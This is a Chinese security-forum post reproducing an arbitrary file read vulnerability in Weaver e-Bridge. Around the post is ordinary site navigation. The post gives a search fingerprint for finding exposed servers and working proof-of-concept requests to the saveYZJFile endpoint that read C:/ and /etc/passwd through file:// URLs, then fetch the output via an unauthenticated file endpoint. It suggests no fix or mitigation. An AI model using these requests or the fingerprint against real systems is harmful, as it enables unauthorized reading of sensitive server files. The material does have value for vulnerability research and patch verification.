问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
WeaverOA E-Bridge saveYZJFile 任意文件读取漏洞
# WeaverOA E-Bridge saveYZJFile 任意文件读取漏洞 ## 漏洞描述 Weaver云桥(e-Bridge)是上海Weaver公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集...
WeaverOA E-Bridge saveYZJFile 任意文件读取漏洞 ====================================== 漏洞描述 ---- Weaver云桥(e-Bridge)是上海Weaver公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。Weaver云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。 影响版本 ---- Weaver云桥 e-Bridge 2018-2019 多个版本 网络测绘 ---- title="Weaver云桥e-Bridge" 漏洞复现 ---- ```php # Windows验证POC /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt ``` ![img](https://shs3.b.qianxin.com/butian_public/f625154109864f1864f06f04948cab7ffd47eaec0d23e.jpg) 成功返回 `id值`,说明含有此漏洞 调用查看文件接口访问 /file/fileNoLogin/id值 ![img](https://shs3.b.qianxin.com/butian_public/f7138754af0ed0d76d31a5019776eb9d958cb451d0e99.jpg) ```php # Linux验证POC /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt ``` ![img](https://shs3.b.qianxin.com/butian_public/f231901ffb39602639398d7c0d657a3199e4534727350.jpg) 成功返回 `id值`,说明含有此漏洞 调用查看文件接口访问 `/file/fileNoLogin/id值` ![img](https://shs3.b.qianxin.com/butian_public/f403692d971df949e0eabb38dc3072ff8161956d1fb62.jpg)
发表于 2024-07-12 18:44:46
阅读 ( 914 )
分类:
OA产品
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!